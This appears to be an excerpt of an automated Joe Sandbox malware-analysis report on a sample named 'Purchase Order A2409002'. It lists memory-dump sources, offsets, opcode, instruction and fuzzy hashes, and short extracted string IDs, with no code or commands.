                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $2
                                        • API String ID: 0-4264767444
                                        • Opcode ID: 8441cde78d55c446f36e27b8bd1bf74919dc1c58cdf05e9a24f927dc78d59283
                                        • Instruction ID: c3e483df80d9468ecc6a17d19c0c6c64f2d0b1d672694e8336c0c6e641506782
                                        • Opcode Fuzzy Hash: 8441cde78d55c446f36e27b8bd1bf74919dc1c58cdf05e9a24f927dc78d59283
                                        • Instruction Fuzzy Hash: FE110A78D18208DFEB80CF69E444AEAB6F6FF45304F10B16AD415EB245D3789A45CF94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $(
                                        • API String ID: 0-55695022
                                        • Opcode ID: 8c7f8e043ce235a8ab0fc009130558391466cf48547426f7f550d185d0ccb68c
                                        • Instruction ID: 3e53ea45be8b771de1cfbc9f304388068b476ba2a659a76c5d8465a2589d9ffb
                                        • Opcode Fuzzy Hash: 8c7f8e043ce235a8ab0fc009130558391466cf48547426f7f550d185d0ccb68c
                                        • Instruction Fuzzy Hash: 08111878D19208CFDB80CF6DD044AEAB6F5EF4A300F10B1698415E7255D7358A05CFA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $3
                                        • API String ID: 0-2301894466
                                        • Opcode ID: d3f0f7bb9afb8385ef0ffa84d3b43c79f46195db3c0e73d65739969c57881938
                                        • Instruction ID: 51ffd0e932fe10343682a3b869b18bc18aa0d72e355e5286f1dc95e729b66ed1
                                        • Opcode Fuzzy Hash: d3f0f7bb9afb8385ef0ffa84d3b43c79f46195db3c0e73d65739969c57881938
                                        • Instruction Fuzzy Hash: 9C014878E19309CFEF80CFADA0449EAB6B6EF86340F10B4668412E7205C7358A02CF94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Offset: 071A0000, based on PE: true
                                        • Associated: 00000000.00000002.2346955002.00000000071F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_71a0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                        • Instruction ID: 4d86c992a2235ca5d2eaa3b372218cb429390b49c931649df04d76a7a070cbee
                                        • Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                        • Instruction Fuzzy Hash: 77C27AAA40E3C26FD7134B749DB66D17FB1EE2321471E08DBD4C18F0A3E2185A5AD762
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vgm
                                        • API String ID: 0-3507608961
                                        • Opcode ID: d94c9de78f87c40e4408d162ecf859f1b3ce659bd00db794903ef34b4403116b
                                        • Instruction ID: 9e66ec4ae8b3e689d060d3b498a0c4b416e01e884e188fb0cb6c778fc8bd84ac
                                        • Opcode Fuzzy Hash: d94c9de78f87c40e4408d162ecf859f1b3ce659bd00db794903ef34b4403116b
                                        • Instruction Fuzzy Hash: 96919DB0E0024ADFDF15CFA9C9917ADBBF2BF89704F148139D405AB294EB749846CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pqI
                                        • API String ID: 0-1078129942
                                        • Opcode ID: 9d65dcd1b08339e91f5ddad590a013da1dfa95af1b19f64bd8c56b5db0aa2375
                                        • Instruction ID: a3117ab2aad84e31305cdd2970bc5201cd6d57602027c43fe23474c6bfe68557
                                        • Opcode Fuzzy Hash: 9d65dcd1b08339e91f5ddad590a013da1dfa95af1b19f64bd8c56b5db0aa2375
                                        • Instruction Fuzzy Hash: 985150B4E0530BDFEB84CF69C4815EEBBF6AF89201F649466D506E7350E3348A41CBA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pqI
                                        • API String ID: 0-1078129942
                                        • Opcode ID: da183eb7f9f00b2ef517fd89ea33068f931fb288106fe68608ac076c1c6f7deb
                                        • Instruction ID: 4d9cd2e188501007fbc2498175748298d87ddeb0d035170ff8d0fe485f69214d
                                        • Opcode Fuzzy Hash: da183eb7f9f00b2ef517fd89ea33068f931fb288106fe68608ac076c1c6f7deb
                                        • Instruction Fuzzy Hash: 3A4161B4E5530B9FEB84CF69C4811EEBAF7AF89201F649925D506E7350E3348A418BE0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: 18d43313d85d92e44e9df93b3b3285516292a58058c42e10e36e187de8517bd5
                                        • Instruction ID: 8503c6d446f11d7fc223ccf8ffcb866cf7e993a2228261f88e403aa2560a9728
                                        • Opcode Fuzzy Hash: 18d43313d85d92e44e9df93b3b3285516292a58058c42e10e36e187de8517bd5
                                        • Instruction Fuzzy Hash: 7841F570D05218CFEB58CFAAC8447AEBBFABF88300F10C0AAC419A7255EB7549458F56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2347013021.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7240000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: a
                                        • API String ID: 0-3904355907
                                        • Opcode ID: a8c27ddddd387ca9f0c314067444f31eac71463daab77a234d7a69b0dd3c5c16
                                        • Instruction ID: 898e64b3295bda31af5c4989098c83fdb798620b26d10c91d9d58828aa5f6725
                                        • Opcode Fuzzy Hash: a8c27ddddd387ca9f0c314067444f31eac71463daab77a234d7a69b0dd3c5c16
                                        • Instruction Fuzzy Hash: B1312FB1D057958BE729CF2B8C54689BFF6AFC6200F04C0EAD448AB156DA740986CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: g
                                        • API String ID: 0-30677878
                                        • Opcode ID: 06f4c33cf43bc74a3372a8e61b8d3b774b283038a80b819031a5822a006fda57
                                        • Instruction ID: 389d63e5c1c3efde4602df3cd84f2142396f0dbe419dfb2e628743cab566f7e7
                                        • Opcode Fuzzy Hash: 06f4c33cf43bc74a3372a8e61b8d3b774b283038a80b819031a5822a006fda57
                                        • Instruction Fuzzy Hash: D931BEB1D156188FEB5DCF6BDC4069AFAFBAFC9304F14D0BA954CA6254EB700A818F41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T
                                        • API String ID: 0-3187964512
                                        • Opcode ID: fbef956bd73cea46a35d57c4077abcc56d2f49ce48db3f757595358807817ee2
                                        • Instruction ID: 3084daa1dda14190ced2dc80777fc153f602d92d86d72574466133f0bf58f118
                                        • Opcode Fuzzy Hash: fbef956bd73cea46a35d57c4077abcc56d2f49ce48db3f757595358807817ee2
                                        • Instruction Fuzzy Hash: 86213E71D497949BD759CF6B8C001DABBF7AFC6300F04C0AA9448AB256DB35094ACF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 0f655993faad17fa0723da91edd1eb2b1d8ff0b8cda6e283fa843791a3b83de7
                                        • Instruction ID: aefa31040ea906f30873cb293c2285f80d57f75724e2ef0b8c438eee4b831c3c
                                        • Opcode Fuzzy Hash: 0f655993faad17fa0723da91edd1eb2b1d8ff0b8cda6e283fa843791a3b83de7
                                        • Instruction Fuzzy Hash: 94216D74D087088FDB44CF6AD8446EABBF6EF8A300F00E46AC815E7255D7348945CF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: g
                                        • API String ID: 0-30677878
                                        • Opcode ID: d4f1d67f10c086461fa218204742c338b5b7506b17f67419cd9d0b8c52194799
                                        • Instruction ID: a7f55dc69ad0ab82ca44d3ab06a50c47ec58a7d79c18e041dc91af92596cb541
                                        • Opcode Fuzzy Hash: d4f1d67f10c086461fa218204742c338b5b7506b17f67419cd9d0b8c52194799
                                        • Instruction Fuzzy Hash: 0231ACB1E056588FEB5DCF6B8C4069AFAFBAFC9300F14D0BA954CA6254EB700A418F41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: a45e38f7fb8c94ae82f43fcd943dc2f679f29f4a9fcdd717e43f63409b2df946
                                        • Instruction ID: 64d5c13c2ff24b44654e2019d84356d31d16caaadcb283afea4932a371dcd4d3
                                        • Opcode Fuzzy Hash: a45e38f7fb8c94ae82f43fcd943dc2f679f29f4a9fcdd717e43f63409b2df946
                                        • Instruction Fuzzy Hash: AE2109B2D44659CBEB58CFABC84029EBAF7AFC9311F04D06E8509AB254DB3508468F40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: f1e641dfa021441300733adcfc2edb200aa52464983c9b921cfd289145132945
                                        • Instruction ID: bd20a88ff8392743a21bdad72ac61af17efd1ab19ae35f2aebb0ec74344d591c
                                        • Opcode Fuzzy Hash: f1e641dfa021441300733adcfc2edb200aa52464983c9b921cfd289145132945
                                        • Instruction Fuzzy Hash: C0213874E08709CFEB44CFAAD8046EEBAF6AF8A300F00E479C915A7255D7748642CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2347013021.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7240000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: a
                                        • API String ID: 0-3904355907
                                        • Opcode ID: 54926cd05b0eb40ea148a191d89d04e8ab6000094339c2d1be1e4bdb83eed66a
                                        • Instruction ID: 34661a312fe056763fba7866180d1cdc146787cc1b3357c92492383d6f452e78
                                        • Opcode Fuzzy Hash: 54926cd05b0eb40ea148a191d89d04e8ab6000094339c2d1be1e4bdb83eed66a
                                        • Instruction Fuzzy Hash: 0F21ECB1D156298BEB28CF5B8C48399FAF7BFC8200F44C0FA950CA6214DB700A858F00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: d3824dcb3f396180941043882f6486a954cffcce22f1fdeae0fd909a71c153ac
                                        • Instruction ID: ce513b684d7513a8a9db223e36db33ef1845fa46ca04556170dc26f2d69160c4
                                        • Opcode Fuzzy Hash: d3824dcb3f396180941043882f6486a954cffcce22f1fdeae0fd909a71c153ac
                                        • Instruction Fuzzy Hash: 9021D871D046588BEB59CF6B8C042DEFBF3AFC9300F04C5AAC408AA268EB350946CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 14974d98a19c606f72e0e49c70a7b1dc7eebb9d129cd12a2b460dd24141bf0e3
                                        • Instruction ID: 88f1ca77479461134b9a7b7035da5eefdf081adb1f2c6155d73899ee3de44809
                                        • Opcode Fuzzy Hash: 14974d98a19c606f72e0e49c70a7b1dc7eebb9d129cd12a2b460dd24141bf0e3
                                        • Instruction Fuzzy Hash: 11114634D19208CFDB40CFA9E448AEABAB6EF46305F00B069C412E7251D7798A46CF94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: b17967dc52383ece94c28ae16c1b8bb583cd354562196f3e1bb1d5e8bd5c458e
                                        • Instruction ID: 1b1551f1acae12ff21417404758087c3557480fb30833eccaab3a89ecc3c6a03
                                        • Opcode Fuzzy Hash: b17967dc52383ece94c28ae16c1b8bb583cd354562196f3e1bb1d5e8bd5c458e
                                        • Instruction Fuzzy Hash: 20115B34D18209CFDB80CF69D044AEABAF6FF45300F00A165C412E7255D3758942CF94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: de629b889b3f3b390366bc9ebb22d416d78941f296df06d3a2b3455bdd185749
                                        • Instruction ID: cab3e13a7bd3cd14c0a8f3bf04dd3b5ef54c226c0e249ea6688ceead21d09f0a
                                        • Opcode Fuzzy Hash: de629b889b3f3b390366bc9ebb22d416d78941f296df06d3a2b3455bdd185749
                                        • Instruction Fuzzy Hash: EA111634D18208CFDB40CF6DE454AEABBF5EF46301F10A1AAC415EB256D7748A06CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 4fa5fc061d40022d457ea6ccce5851fb00d28029466bbed62f67b8583bd770b0
                                        • Instruction ID: 67f1f00927418cc02cb71cdd9c939d75e1309620dcc9e5ea07e5a61188308820
                                        • Opcode Fuzzy Hash: 4fa5fc061d40022d457ea6ccce5851fb00d28029466bbed62f67b8583bd770b0
                                        • Instruction Fuzzy Hash: F8111374D18309CEEF80CEA9D444AAAB6B6EF45300F10B169D416E7241D7798941CB94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: d51fb9db83ced162956b321b6bceb9423c475f7c595e22a96df4af7e513d42d8
                                        • Instruction ID: 22f6bd2c788d9456593077590684e3df0ee66a547330367ff3fa472115ac62ff
                                        • Opcode Fuzzy Hash: d51fb9db83ced162956b321b6bceb9423c475f7c595e22a96df4af7e513d42d8
                                        • Instruction Fuzzy Hash: 19111574E18308CFDB84CF6EE4449EAB6F6EF89301F10B06A9416E7255D7358942CF94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: cef086eefabbccf26cfb0bb0d4c7685826dcafd16b1c9f9e6146c06c0f1e88e1
                                        • Instruction ID: 985450d5deb6c0f9f6cb29c6aafbe28d7b8c71f500dde8774d13713b1ea4f158
                                        • Opcode Fuzzy Hash: cef086eefabbccf26cfb0bb0d4c7685826dcafd16b1c9f9e6146c06c0f1e88e1
                                        • Instruction Fuzzy Hash: 1011E534D18308CFDB80CF69E084AEAB6B6EF46305F14B06AC416AB255C7798945CFA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 461524328df01e85721a86a9e51bf27a6d27e442215f20538fccb15542c7ed17
                                        • Instruction ID: 45daf4c8bc61fd3d60a2d21c5b4fde1a6cc67af40257d87bb52779166e3f637c
                                        • Opcode Fuzzy Hash: 461524328df01e85721a86a9e51bf27a6d27e442215f20538fccb15542c7ed17
                                        • Instruction Fuzzy Hash: A0012538918308CFEB40CF68E4089EABAB9EF46341F10B1A69416EB165C3348901CBA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a219287ae97a0527400bcbce91ff930bf38d441e5e8a76b6eaf0e957889f25a
                                        • Instruction ID: 362664dfca590d0e8dbfa8297c398e8702b98d44d1d221e71ea408a647a158eb
                                        • Opcode Fuzzy Hash: 6a219287ae97a0527400bcbce91ff930bf38d441e5e8a76b6eaf0e957889f25a
                                        • Instruction Fuzzy Hash: 371258B0B146168FDB48CFA9C49467EFBF6FF88304F148629D56A97340DB74A941CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1a3c140eb925ea85f32b8b7371a5d689616e7dcd14f66b8edb3605c9110bc25
                                        • Instruction ID: 1b3d7cc9cb41776fdd118570f6bdee910dc30de17def8faee8765a0633b7903a
                                        • Opcode Fuzzy Hash: b1a3c140eb925ea85f32b8b7371a5d689616e7dcd14f66b8edb3605c9110bc25
                                        • Instruction Fuzzy Hash: 2B12A471E006598FDB54CFAAC98069DFBF2FF88304F24C169D459AB219E734A946CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3d8a3b95cdf03e092cb0964e7390563decfac3137cddb4c305ebd66ed875a4c
                                        • Instruction ID: 93346c2872ae972f0e59d55772b69e8da6399dcd63c1214739a9054a70c7ae89
                                        • Opcode Fuzzy Hash: e3d8a3b95cdf03e092cb0964e7390563decfac3137cddb4c305ebd66ed875a4c
                                        • Instruction Fuzzy Hash: 28D10534A01606CFDB54DF69C684AA9FBF2BF89320F25C5A9E5059B361DB31EC81CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbb01c7c554e2833aa8d4ead6e439a072d08064cdb57a908d2cd49603dc287ef
                                        • Instruction ID: 3845af4503366e9af90e7cb68b429d8503541c79fa692660cf5fafc34193bb88
                                        • Opcode Fuzzy Hash: cbb01c7c554e2833aa8d4ead6e439a072d08064cdb57a908d2cd49603dc287ef
                                        • Instruction Fuzzy Hash: B2D1E474E01258CFEB94DFA5D894BAEBBF2FB99300F1080A9D409A7395DB345986CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc0fa7eee652270f573a005cb19a6316c201d6c7923efb8580d24909c218f75f
                                        • Instruction ID: f7c9cc623fc59de3c73c8098ba2fe541db77e1c07d062ff0246cd1203585e422
                                        • Opcode Fuzzy Hash: fc0fa7eee652270f573a005cb19a6316c201d6c7923efb8580d24909c218f75f
                                        • Instruction Fuzzy Hash: 17D1E574E05258CFEB94DFA5D894BADBBF2FB89300F1080A9D409AB395DB345986CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 203bd535446e0d7a7ce3bcbd7d99e3d4679ad7609b15920effe2be2d0985a6a1
                                        • Instruction ID: 635b2e119c3d2e5abe586dec31106cc03d6728afda73c8404d96852291cd9d19
                                        • Opcode Fuzzy Hash: 203bd535446e0d7a7ce3bcbd7d99e3d4679ad7609b15920effe2be2d0985a6a1
                                        • Instruction Fuzzy Hash: C9D13874D05258CFEB94DFA5D894BADBBF2FB98300F1080A9D409AB395DB345986CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 782cc0da7696edf287bf2c675ca750acd3dae3bcd0a6f04c12b68735dd1cc6c3
                                        • Instruction ID: a10cda797df0fb52a424629c21b5d4577300ae580764d267c7ca48eb98c95563
                                        • Opcode Fuzzy Hash: 782cc0da7696edf287bf2c675ca750acd3dae3bcd0a6f04c12b68735dd1cc6c3
                                        • Instruction Fuzzy Hash: 43B10370E00219CFEB58DFA9E884B9DBBF2FB89301F119069E419A7355DB346985CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50abdad4d16534777e8889f615d43190860381f504a9aece73915f4efd7fe063
                                        • Instruction ID: 1bf4fb7f7831f47543603aa711cfe7de8ea99b71efc01fece17d9b459830886d
                                        • Opcode Fuzzy Hash: 50abdad4d16534777e8889f615d43190860381f504a9aece73915f4efd7fe063
                                        • Instruction Fuzzy Hash: D4B1F174E00219CFEB54DFA9E884B9EBBF2FB89300F119069E419A7354DB346985CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e77158403e87928bba5d70c80844891470570e02ddff71849b6287d61433766a
                                        • Instruction ID: 3df28d16abfb133ecac2636215f3a52a5dd2e780ffcb49e393a0997504b8781b
                                        • Opcode Fuzzy Hash: e77158403e87928bba5d70c80844891470570e02ddff71849b6287d61433766a
                                        • Instruction Fuzzy Hash: A2B1F270E0421DCFEB54CFA9DA84BADBBF2BB89310F1090A9D509AB255DB346985CF44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9d12e6861e08f3cd807c39ebf1d12a3baa8393ccee370d244833be079dfdde2
                                        • Instruction ID: 4427a41624689c329271312711e86ada07acad0fc8f60160be09b1aec180d5a8
                                        • Opcode Fuzzy Hash: e9d12e6861e08f3cd807c39ebf1d12a3baa8393ccee370d244833be079dfdde2
                                        • Instruction Fuzzy Hash: 8AB1E074E0021DCFEB94CFAACA84B9DBBF2BF89314F1090A9D509A7255DB346985CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4020b113d265af3f1bc6454e99f342205f537482586b30e8cc3d29bd0ee962b2
                                        • Instruction ID: e974408a8f84299c31b336b975ab4a9e7fca5364a441fd3fde72703ff4907869
                                        • Opcode Fuzzy Hash: 4020b113d265af3f1bc6454e99f342205f537482586b30e8cc3d29bd0ee962b2
                                        • Instruction Fuzzy Hash: D1C18575E006588FDB58CF6AD944ADDBBF2AF89300F14C1AAD909AB365DB305E81CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ce0f60b929184f1fb9c0ec9747e38b51217bd273ece16a0702f79bda66293a2
                                        • Instruction ID: 73f57889eb10a7d50556414c2b8993fbecb20edf9a83cb414cc951e2f11ea84d
